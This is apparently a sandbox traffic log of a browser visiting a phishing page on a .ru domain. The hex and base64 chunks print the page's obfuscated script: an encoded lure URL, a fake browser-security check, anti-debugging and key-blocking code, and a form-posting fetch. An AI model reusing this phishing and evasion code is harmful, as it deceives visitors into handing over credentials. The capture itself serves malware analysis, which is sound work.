                                                                                              Date: Thu, 19 Dec 2024 13:35:54 GMT
                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Cache-Control: no-cache, private
                                                                                              cf-cache-status: DYNAMIC
                                                                                              vary: accept-encoding
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sff6AFTO1meEfjssQXI53BAkg0bzF9jEHPijilJh8XTtbvl05MwgRk5hSaODyJuUQbcCjuLlfCmwuriOZftCSHZY9LoWAawC9m4HQK%2BStO1CPY6dgZE1W%2FbdohRI5g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=51011&min_rtt=50815&rtt_var=14483&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1555&delivery_rate=56315&cwnd=251&unsent_bytes=0&cid=c09070ff68159b1c&ts=225&x=0"
                                                                                              Set-Cookie: XSRF-TOKEN=eyJpdiI6IlA0ZjZaaWtlSXpkL2RLaG9Ja1BmZ3c9PSIsInZhbHVlIjoiYW54anBCNDl5b0VMMWcreGUvR1RUVnVqRWJUMVg3Myt4bnhMN0YxSjFmcGMyV0h5YWVySG1rRFhCY1R5emJOWXcySUtiU214VGhSUGtWRGVlVjJSRkd1elo0bFA1dkJDUkhJa2dBT09qdWlVNm5HNzRSODBpbmlSVkRXWTl2Nk0iLCJtYWMiOiI4OWNhMTA2ZmJiMTZlM2NlNDJkMGVmZTA4ZDY1NmU2MjdjM2NkZTFlMjg3NmQ3ZDhlNjc1MjU2NWExOGRlOTBiIiwidGFnIjoiIn0%3D; expires=Thu, 19-Dec-2024 15:35:54 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                                              2024-12-19 13:35:54 UTC734INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 59 78 55 44 42 48 63 56 5a 52 5a 54 51 79 51 55 6c 59 53 32 51 34 51 55 56 53 53 58 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 61 48 46 6f 5a 7a 52 71 56 33 64 4b 65 55 56 4a 59 31 59 78 5a 57 46 72 61 57 67 35 64 53 39 4d 61 44 4d 78 65 55 4e 71 63 46 70 50 63 58 70 31 53 58 4a 6e 4f 57 4e 72 53 45 70 6c 65 6b 78 4f 5a 32 67 77 52 44 46 46 54 57 49 35 65 45 4e 30 65 6a 4e 6a 62 31 45 35 65 47 39 7a 54 48 56 53 53 43 73 78 64 30 70 33 62 7a 52 78 52 44 56 71 55 7a 68 54 5a 55 70 35 56 31 4a 54 53 33 4e 56 55 44 5a 79 53 7a 51 31 4d 48 6c 45 4b 32 4e 6b 55 56 68 74 54 56 5a 76 63 30 46 76 56 56 6c 71 4d 32 39 51 4f 57 4a 71 56 32 77
                                                                                              Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlYxUDBHcVZRZTQyQUlYS2Q4QUVSSXc9PSIsInZhbHVlIjoiaHFoZzRqV3dKeUVJY1YxZWFraWg5dS9MaDMxeUNqcFpPcXp1SXJnOWNrSEplekxOZ2gwRDFFTWI5eEN0ejNjb1E5eG9zTHVSSCsxd0p3bzRxRDVqUzhTZUp5V1JTS3NVUDZySzQ1MHlEK2NkUVhtTVZvc0FvVVlqM29QOWJqV2w
                                                                                              2024-12-19 13:35:54 UTC1369INData Raw: 34 64 31 31 0d 0a 3c 21 2d 2d 20 54 68 65 20 77 61 79 20 74 6f 20 67 65 74 20 73 74 61 72 74 65 64 20 69 73 20 74 6f 20 71 75 69 74 20 74 61 6c 6b 69 6e 67 20 61 6e 64 20 62 65 67 69 6e 20 64 6f 69 6e 67 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 44 6f 76 4c 31 70 32 5a 55 51 75 5a 33 56 79 59 58 52 70 64 6d 56 36 4c 6e 4a 31 4c 32 68 49 4e 31 39 44 54 47 5a 58 4f 45 49 77 4e 6e 56 45 57 6d 4a 47 62 55 46 70 54 48 63 76 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 44 51 6f 38 61 48 52 74 62
                                                                                              Data Ascii: 4d11... The way to get started is to quit talking and begin doing. --><script>if(atob("aHR0cDovL1p2ZUQuZ3VyYXRpdmV6LnJ1L2hIN19DTGZXOEIwNnVEWmJGbUFpTHcv") == "nomatch"){document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtb
                                                                                              2024-12-19 13:35:54 UTC1369INData Raw: 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 33 46 32 59 30 35 50 59 55 78 77 55 55 59 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 45 30 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73 71 4c 33 42 68 5a 47 52 70 62 6d 63 74 63 6d 6c 6e 61 48 51 36 49 48 5a 68 63 69 67 74 4c 57 4a 7a 4c 57 64 31 64 48 52 6c 63 69 31 34 4c 43 41 75 4e 7a 56 79 5a 57 30 70 4f 33 42 68 5a 47 52 70 62 6d 63 74 62 47 56 6d 64 44 6f 67 64 6d 46 79 4b 43 30 74 59 6e 4d 74 5a 33 56 30 64 47 56 79 4c 58 67 73 49 43 34 33 4e 58 4a 6c 62 53 6b 37 62 57 46 79 5a 32 6c 75 4c 58 4a 70 5a 32 68 30 4f 69 42 68 64 58 52 76 4f 32 31 68 63 6d
                                                                                              Data Ascii: tOjFyZW07fQ0KI3F2Y05PYUxwUUYuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTE0cHg7Lyp3aWR0aDogMTAwJTsqL3BhZGRpbmctcmlnaHQ6IHZhcigtLWJzLWd1dHRlci14LCAuNzVyZW0pO3BhZGRpbmctbGVmdDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7bWFyZ2luLXJpZ2h0OiBhdXRvO21hcm
                                                                                              2024-12-19 13:35:54 UTC1369INData Raw: 4d 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51 6f 67 49 43 41 67 66 51 30 4b 44 51 6f 67 49 43 41 67 61 57 59 67 4b 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 72 5a 58 6c 44 62 32 52 6c 49 44 30 39 50 53 41 34 4e 53 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 63 32 68 70 5a 6e 52 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41
                                                                                              Data Ascii: Mykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA
                                                                                              2024-12-19 13:35:54 UTC1369INData Raw: 43 41 67 49 47 52 6c 59 6e 56 6e 5a 32 56 79 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 62 32 35 7a 64 43 42 32 57 6d 78 6b 5a 57 31 31 59 32 39 50 49 44 30 67 63 47 56 79 5a 6d 39 79 62 57 46 75 59 32 55 75 62 6d 39 33 4b 43 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 47 6c 6d 49 43 68 32 57 6d 78 6b 5a 57 31 31 59 32 39 50 49 43 30 67 53 6d 4a 78 55 45 68 44 63 56 42 35 51 53 41 2b 49 48 4e 70 57 45 78 54 51 30 31 4f 61 45 38 67 4a 69 59 67 49 55 46 6b 53 6d 52 31 64 48 52 77 63 33 6b 70 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 47 52 4b 53 46 5a 58 51 6d 52 33 5a 57 45 67 50 53 42 30 63 6e 56 6c 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 51 57 52 4b 5a 48 56 30 64 48 42 7a 65 53 41 39 49 48 52 79 64 57 55 37
                                                                                              Data Ascii: CAgIGRlYnVnZ2VyOw0KICAgICAgICBjb25zdCB2WmxkZW11Y29PID0gcGVyZm9ybWFuY2Uubm93KCk7DQogICAgICAgIGlmICh2WmxkZW11Y29PIC0gSmJxUEhDcVB5QSA+IHNpWExTQ01OaE8gJiYgIUFkSmR1dHRwc3kpIHsNCiAgICAgICAgICAgIGRKSFZXQmR3ZWEgPSB0cnVlOw0KICAgICAgICAgICAgQWRKZHV0dHBzeSA9IHRydWU7
                                                                                              2024-12-19 13:35:54 UTC1369INData Raw: 4a 73 64 47 52 6b 59 58 52 68 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 5a 47 46 30 59 53 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 44 51 6f 38 4c 32 5a 76 63 6d 30 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 78 6b 61 58 59 67 59 32 78 68 63 33 4d 39 49 6e 52 6c 65 48 51 74 59 32 56 75 64 47 56 79 49 69 42 70 5a 44 30 69 52 6d 56 54 59 58 5a 76 57 47 4e 4c 55 69 49 2b 44 51 70 46 62 6e 4e 31 63 6d 6c 75 5a 79 42 35 62 33 56 79 49 47 4a 79 62 33 64 7a 5a 58 49 67 61 58 4d 67 63 32 56 6a 64 58 4a 6c 49 47 5a 76 63 69 42 35 62 33 56 79 49 48 4e 68 5a 6d 56 30 65 53 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 43 39 6d 62 33 4a 74 50 67 30 4b 50 43 39 6b 61 58 59 2b 44 51 6f 38 4c 32 52 70 64 6a 34 4e 43 6a 77 76 5a 47 6c 32 50 67 30 4b 50 48 4e 6a 63
                                                                                              Data Ascii: JsdGRkYXRhIiBuYW1lPSJibHRkZGF0YSIgdmFsdWU9IiI+DQo8L2Zvcm0+DQo8L2Rpdj4NCjxkaXYgY2xhc3M9InRleHQtY2VudGVyIiBpZD0iRmVTYXZvWGNLUiI+DQpFbnN1cmluZyB5b3VyIGJyb3dzZXIgaXMgc2VjdXJlIGZvciB5b3VyIHNhZmV0eS4NCjwvZGl2Pg0KPC9mb3JtPg0KPC9kaXY+DQo8L2Rpdj4NCjwvZGl2Pg0KPHNjc
                                                                                              2024-12-19 13:35:54 UTC1369INData Raw: 67 59 6d 39 6b 65 54 6f 67 62 6d 56 33 49 45 5a 76 63 6d 31 45 59 58 52 68 4b 47 68 7a 5a 6c 64 57 55 47 4e 6e 54 48 51 70 44 51 6f 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 79 5a 58 4e 77 62 32 35 7a 5a 53 41 39 50 69 42 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 4a 6c 64 48 56 79 62 69 42 79 5a 58 4e 77 62 32 35 7a 5a 53 35 71 63 32 39 75 4b 43 6b 37 44 51 6f 67 49 43 41 67 66 53 6b 75 64 47 68 6c 62 69 68 6b 59 58 52 68 49 44 30 2b 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 6f 5a 47 46 30 59 56 73 6e 63 33 52 68 64 48 56 7a 4a 31 30 67 50 54 30 67 4a 33 4e 31 59 32 4e 6c 63 33 4d 6e 4b 58 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 61 57 59 6f 5a 45 70 49 56 6c 64 43 5a 48 64 6c 59 53 41 39 50 53 42 6d 59 57 78 7a 5a 53 6c 37 44 51
                                                                                              Data Ascii: gYm9keTogbmV3IEZvcm1EYXRhKGhzZldWUGNnTHQpDQogICAgfSkudGhlbihyZXNwb25zZSA9PiB7DQogICAgICAgIHJldHVybiByZXNwb25zZS5qc29uKCk7DQogICAgfSkudGhlbihkYXRhID0+IHsNCiAgICAgICAgaWYoZGF0YVsnc3RhdHVzJ10gPT0gJ3N1Y2Nlc3MnKXsNCiAgICAgICAgaWYoZEpIVldCZHdlYSA9PSBmYWxzZSl7DQ
                                                                                              2024-12-19 13:35:54 UTC1369INData Raw: 73 70 6c 69 74 28 27 2e 27 29 2e 73 6c 69 63 65 28 2d 32 29 2e 6a 6f 69 6e 28 27 2e 27 29 3b 0d 0a 0d 0a 69 66 28 47 61 4a 74 6f 64 75 6a 61 47 20 3d 3d 20 56 56 52 6a 4c 48 58 6e 67 44 29 7b 0d 0a 63 6f 6e 73 74 20 68 6a 5a 6a 73 69 53 66 76 4b 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2e 73 70 6c 69 74 28 27 25 32 33 27 29 5b 30 5d 2e 73 70 6c 69 74 28 27 25 33 46 27 29 5b 30 5d 3b 0d 0a 69 66 20 28 4b 6e 70 48 4a 63 47 58 4a 72 2e 70 61 74 68 6e 61 6d 65 2e 65 6e 64 73 57 69 74 68 28 27 2f 27 29 29 20 7b 0d 0a 4b 6e 70 48 4a 63 47 58 4a 72 2e 70 61 74 68 6e 61 6d 65 20 3d 20 4b 6e 70 48 4a 63 47 58 4a 72 2e 70 61 74 68 6e 61 6d 65 2e 73 6c 69 63 65 28 30 2c 20 2d 31 29 3b 0d 0a 7d 0d 0a 63 6f 6e 73 74 20 59 61 79
                                                                                              Data Ascii: split('.').slice(-2).join('.');if(GaJtodujaG == VVRjLHXngD){const hjZjsiSfvK = window.location.pathname.split('%23')[0].split('%3F')[0];if (KnpHJcGXJr.pathname.endsWith('/')) {KnpHJcGXJr.pathname = KnpHJcGXJr.pathname.slice(0, -1);}const Yay
                                                                                              2024-12-19 13:35:54 UTC1369INData Raw: 44 51 70 41 62 57 56 6b 61 57 45 67 4b 47 31 70 62 69 31 33 61 57 52 30 61 44 6f 78 4d 6a 41 77 63 48 67 70 65 77 30 4b 49 33 46 32 59 30 35 50 59 55 78 77 55 55 59 67 61 44 52 37 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 6a 45 75 4e 58 4a 6c 62 54 74 39 44 51 70 39 44 51 6f 6a 63 58 5a 6a 54 6b 39 68 54 48 42 52 52 69 42 77 65 32 31 68 63 6d 64 70 62 69 31 30 62 33 41 36 4d 44 74 74 59 58 4a 6e 61 57 34 74 59 6d 39 30 64 47 39 74 4f 6a 46 79 5a 57 30 37 66 51 30 4b 49 33 46 32 59 30 35 50 59 55 78 77 55 55 59 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 59 57 6c 75 5a 58 4a 37 63 47 39 7a 61 58 52 70 62 32 34 36 49 48 4a 6c 62 47 46 30 61 58 5a 6c 4f 33 52 76 63 44 6f 67 4d 54 45 30 63 48 67 37 4c 79 70 33 61 57 52 30 61 44 6f 67 4d 54 41 77 4a 54 73
                                                                                              Data Ascii: DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI3F2Y05PYUxwUUYgaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojcXZjTk9hTHBRRiBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI3F2Y05PYUxwUUYuY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogMTE0cHg7Lyp3aWR0aDogMTAwJTs
                                                                                              2024-12-19 13:35:54 UTC1369INData Raw: 32 34 67 50 53 41 69 59 57 4a 76 64 58 51 36 59 6d 78 68 62 6d 73 69 4f 77 30 4b 66 51 30 4b 5a 47 39 6a 64 57 31 6c 62 6e 51 75 59 57 52 6b 52 58 5a 6c 62 6e 52 4d 61 58 4e 30 5a 57 35 6c 63 69 67 6e 61 32 56 35 5a 47 39 33 62 69 63 73 49 47 5a 31 62 6d 4e 30 61 57 39 75 4b 47 56 32 5a 57 35 30 4b 53 42 37 44 51 6f 67 49 43 41 67 61 57 59 67 4b 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 45 79 4d 79 6b 67 65 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6c 64 6d 56 75 64 43 35 77 63 6d 56 32 5a 57 35 30 52 47 56 6d 59 58 56 73 64 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 79 5a 58 52 31 63 6d 34 67 5a 6d 46 73 63 32 55 37 44 51 6f 67 49 43 41 67 66 51 30 4b 44 51 6f 67 49 43 41 67 61 57 59 67 4b 41 30 4b 49 43 41 67
                                                                                              Data Ascii: 24gPSAiYWJvdXQ6YmxhbmsiOw0KfQ0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcigna2V5ZG93bicsIGZ1bmN0aW9uKGV2ZW50KSB7DQogICAgaWYgKGV2ZW50LmtleUNvZGUgPT09IDEyMykgew0KICAgICAgICBldmVudC5wcmV2ZW50RGVmYXVsdCgpOw0KICAgICAgICByZXR1cm4gZmFsc2U7DQogICAgfQ0KDQogICAgaWYgKA0KICAg


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              6192.168.2.649735104.17.24.144436216C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2024-12-19 13:35:56 UTC651OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                                              Host: cdnjs.cloudflare.com
                                                                                              Connection: keep-alive
                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                              sec-ch-ua-mobile: ?0
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                              sec-ch-ua-platform: "Windows"
                                                                                              Accept: */*
                                                                                              Sec-Fetch-Site: cross-site
                                                                                              Sec-Fetch-Mode: no-cors
                                                                                              Sec-Fetch-Dest: script
                                                                                              Referer: https://e4x6.gurativez.ru/
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              2024-12-19 13:35:56 UTC959INHTTP/1.1 200 OK
                                                                                              Date: Thu, 19 Dec 2024 13:35:56 GMT
                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Cache-Control: public, max-age=30672000
                                                                                              ETag: W/"61182885-40eb"
                                                                                              Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                                              cf-cdnjs-via: cfworker/kv
                                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                                              Timing-Allow-Origin: *
                                                                                              X-Content-Type-Options: nosniff
                                                                                              CF-Cache-Status: HIT
                                                                                              Age: 71211
                                                                                              Expires: Tue, 09 Dec 2025 13:35:56 GMT
                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HGmgsA%2FvtjR1f1v%2FpKBo4rbagDOtTBd0FQKotHghLbCVEWC69eJSFnybxAe31JqE3HDMId7be1NNYdZ1zSTz8E9HYI4a34MtezsmIfN9JAvXqSEwuwUMA4y%2FRoay%2F2J6ilHBhweP"}],"group":"cf-nel","max_age":604800}
                                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                              Strict-Transport-Security: max-age=15780000
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 8f47c759eb81437f-EWR
                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                              2024-12-19 13:35:56 UTC410INData Raw: 37 62 66 32 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                                              Data Ascii: 7bf2!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                                              2024-12-19 13:35:56 UTC1369INData Raw: 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74 2e 63 72 65
                                                                                              Data Ascii: f globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.cre
                                                                                              2024-12-19 13:35:56 UTC1369INData Raw: 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42 79 74 65 73
                                                                                              Data Ascii: call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes
                                                                                              2024-12-19 13:35:56 UTC1369INData Raw: 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30 3b 61 3c 63
                                                                                              Data Ascii: peof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c
                                                                                              2024-12-19 13:35:56 UTC1369INData Raw: 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33 5d 3e 3e 3e
                                                                                              Data Ascii: var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3]>>>
